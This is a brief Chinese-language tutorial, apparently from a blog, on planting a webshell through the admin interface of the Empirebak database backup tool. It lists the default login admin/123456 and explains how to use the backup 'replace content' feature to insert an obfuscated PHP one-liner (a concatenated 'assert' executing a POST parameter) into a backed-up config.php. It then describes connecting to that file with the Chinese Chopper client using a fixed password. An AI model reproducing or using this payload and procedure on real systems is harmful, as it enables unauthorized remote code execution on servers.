帝国备份王(Empirebak)后台拿webshell

默认账号密码为 

admin 123456 

登陆后先备份一次数据 

备份时可选择备份到的目录，默认有个safemod 

当然也可以是别的..这里以safemod来说了 

备份完毕后来到 

管理备份目录 

打包并下载 

把开始备份到的数据可以先下回分析..当然数据库比较大的话可以省略这一步.

因为我之前下载已经分析完毕了 

备份后的safemod目录下所有的表都是以PHP保存的..Empirebak管理备份目录 下有个替换文件内容 功能 

如果你不知道要替换什么内容的话..那最好还是下载备份文件回来看下 

我是替换 

config.php的内容 

内容加 <? $x="a"."ss"."er"."t"; $x($_POST["iick"]); ?>

替换 

http://www.iick.blog/upload/bdata/safemod/config.php 

菜刀链接测试， 能连接证明成功得到shell 

密码为iick

前提是要有管理密码能进入管理